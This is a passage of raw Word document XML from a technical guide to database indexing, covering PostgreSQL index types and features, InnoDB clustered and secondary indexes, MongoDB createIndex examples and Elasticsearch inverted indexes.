              <w:t>Equality-only lookups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D5950A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>USING hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="5BB3914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8BB6A2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>GIN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EA0631" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Full-text, JSONB, arrays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FC7F7B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>USING gin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="01C6534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D98440" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>GiST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B33FDA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Spatial, ranges, full-text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A5554E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>USING gist</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="5D97030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757847" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>SP-GiST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93F917" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Partitioned search trees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C7A1CD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>USING spgist</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="22C7067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5BD6F3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>BRIN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51CC9E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Large sequential tables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23A6E8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>USING brin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4851057C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL-specific features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674C4D98" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7549C178" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Partial index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298FFF19" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx ON orders(created_at) WHERE status = 'pending';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143A2825" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="1622C08D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Expression index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E41A209" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx ON users(LOWER(email));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F211AE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="4F9D14F4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Covering index (INCLUDE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5839BF30" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx ON orders(customer_id) INCLUDE (total, status);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A687984" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="550A9811" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Concurrent index creation (non-blocking)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12789939" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX CONCURRENTLY idx ON large_table(column);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379AD967" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="4A931903" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Multicolumn index with mixed sort orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083364B4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx ON events(user_id ASC, created_at DESC);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AB1459" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MVCC and index bloat:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3874B2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1468"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>PostgreSQL doesn't update rows in-place — it creates a new version (MVCC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE1ACBF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1468"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Dead tuples (old versions) accumulate in indexes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AD24A7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1468"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>VACUUM removes dead tuples from heap AND indexes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256411E1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1468"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Without regular vacuuming → index bloat → larger index → slower scans → wasted memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0EBE48" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.2 MySQL (InnoDB) Indexing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA685F4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>InnoDB's clustered index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426DCB84" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1469"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Primary key IS the clustered index (data stored in PK order).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092553AF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1469"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Secondary indexes store PK values as "pointers" (not heap addresses).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7808140C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1469"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Reading via secondary index = 2 B-Tree lookups (secondary → PK → data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F60864" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>InnoDB-specific features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ACE43B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BC8799" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Prefix index (index only first N characters — saves space)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAABC17" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx ON articles(title(50));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFEB172" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="48EA3C41" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Covering index (all needed columns in index — avoids PK lookup)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D165B49" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx ON orders(customer_id, status, total);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB8D8E9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Query: SELECT status, total FROM orders WHERE customer_id = 42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776630DE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- → Uses idx directly, never touches clustered index (index-only scan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266DA6C4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="57A37941" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Descending index (MySQL 8.0+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356F9A77" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx ON events(user_id ASC, timestamp DESC);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158597A2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="4116D182" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Invisible index (exists but optimizer ignores it — for testing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23702FC9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>ALTER INDEX idx INVISIBLE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E5F768" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The InnoDB secondary index penalty:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E510BE7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56425C75" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>PostgreSQL: Secondary index → heap row pointer → 1 random I/O</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE1CF8B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>InnoDB:     Secondary index → primary key → clustered index lookup → 2 random I/Os (worst case)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E3D592" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="66852637" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>This makes covering indexes EXTRA valuable in InnoDB — they avoid the expensive PK lookup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D180691" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.3 MongoDB Indexing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC0A272" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2224CAFB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>// Single field index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788BB14F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>db.users.createIndex({ email: 1 })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221E1165" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="768E2688" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>// Compound index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46691D40" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>db.orders.createIndex({ customer_id: 1, order_date: -1 })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4994052E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="4E9782E3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>// Multikey index (array fields)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25851BC1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>db.articles.createIndex({ tags: 1 })  // indexes each array element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E86740E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="071F3F17" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>// Text index (full-text search)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C40E86" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>db.articles.createIndex({ title: "text", body: "text" })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006E1B3A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="1B172CCE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>// Geospatial index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631E9F2B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>db.places.createIndex({ location: "2dsphere" })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CD3324" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="632FA745" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>// Partial index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3630EEF0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>db.orders.createIndex(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4B441C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  { status: 1 },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78808E41" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  { partialFilterExpression: { quantity: { $gt: 5 } } }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DE5AA2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B47DEFA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="1F420CD7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>// TTL index (auto-delete documents after time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F35CC9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>db.sessions.createIndex({ createdAt: 1 }, { expireAfterSeconds: 3600 })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3B6C33" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MongoDB's _id index:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Every collection has a unique index on _id (automatically). This is NOT a clustered index — MongoDB uses WiredTiger's internal row format (not index-organized).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B2D0EC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.4 Elasticsearch / Lucene Indexing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B05B2E4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fundamentally different from relational databases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ACC7C6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Elasticsearch uses inverted indexes (like GIN) as the PRIMARY access method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73789C77" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75178181" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Document 1: { "title": "Quick Brown Fox", "status": "published" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D030DE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Document 2: { "title": "Lazy Brown Dog", "status": "draft" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEF89FE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="628DAAD7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Inverted index for "title":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDFE493" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  "quick"  → [doc1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B50DFDF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  "brown"  → [doc1, doc2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A9739B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  "fox"    → [doc1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C4FC6A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  "lazy"   → [doc2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B14590E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  "dog"    → [doc2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A9532B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="28E84D73" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Inverted index for "status":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EFEA6C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  "published" → [doc1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79013388" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  "draft"     → [doc2]</w:t>
      </w:r>
    </w:p>
